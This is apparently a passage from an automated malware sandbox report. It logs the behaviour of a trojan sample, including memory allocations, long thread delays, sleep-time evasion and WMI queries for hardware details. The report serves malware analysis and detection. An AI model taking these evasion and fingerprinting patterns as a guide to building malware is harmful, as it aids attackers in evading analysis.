                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2680000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2900000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeMemory allocated: 2680000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 1090000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2E00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeMemory allocated: 2D30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 5636Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 4111Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6418
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 380
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 5004
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeWindow / User API: threadDelayed 4785
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 2164
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 3368
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 3462
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWindow / User API: threadDelayed 6371
                      Source: C:\Users\Public\Libraries\lxsyrsiW.pifDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                      Source: C:\Users\Public\Libraries\Wisrysxl.PIFAPI coverage: 9.7 %
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep count: 37 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -34126476536362649s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 1476Thread sleep count: 5636 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99858s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99742s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99621s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99494s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99381s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99238s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99085s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98968s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 1476Thread sleep count: 4111 > 30Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98857s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98720s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98588s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98473s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98349s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98205s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97680s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97548s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97424s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97296s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97180s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97070s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -96959s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -96836s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -96710s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -96602s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -96492s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -96381s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99875s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99765s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99656s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99547s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99438s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99316s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -99129s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98922s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98797s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98685s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98576s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98469s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98344s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98235s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -98110s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97977s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97874s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97761s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97635s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97528s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97416s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97304s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97192s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -97066s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -96917s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -96324s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -96189s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -96061s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 3228Thread sleep time: -95931s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 1272Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1680Thread sleep count: 6418 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3552Thread sleep time: -5534023222112862s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1680Thread sleep count: 380 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5680Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7264Thread sleep time: -300240000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 7264Thread sleep time: -287100000s >= -30000s
                      Source: C:\Windows\SysWOW64\timeout.exe TID: 1488Thread sleep count: 42 > 30
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 5456Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -16602069666338586s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -200000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7680Thread sleep count: 2164 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -99825s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -99696s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -99584s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -99460s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -99346s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7680Thread sleep count: 3368 > 30
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -99224s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -99099s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -98974s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -98849s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -98724s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -98599s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -98409s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -98233s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -98076s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -97974s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -97849s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -97724s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -97599s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -97474s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -97349s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -97224s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -97099s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -96974s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -96849s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -96724s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -96599s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -96474s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -99824s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7676Thread sleep time: -99536s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 7600Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -28592453314249787s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -200000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99860s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99745s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99633s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99513s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99401s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99292s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99171s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99057s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98945s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98762s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98485s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98370s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98260s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98111s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97995s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97886s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97775s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97667s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97558s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97448s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97339s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97229s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97083s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -96964s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -96855s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -96745s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -96636s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -96526s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -96400s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99855s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99749s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99640s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99421s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99312s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99177s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -99062s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98836s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98734s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98515s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98406s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98296s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98187s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -98078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97968s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97859s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97749s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97640s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7960Thread sleep time: -97487s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 7892Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe TID: 8012Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 4_2_02B15908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,4_2_02B15908
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99858Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99742Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99621Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99494Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99381Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99238Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 99085Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98968Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98857Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98720Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98588Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98473Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98349Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 98205Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97680Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97548Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97424Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97296Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97180Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\neworigin.exeThread delayed: delay time: 97070Jump to behavior
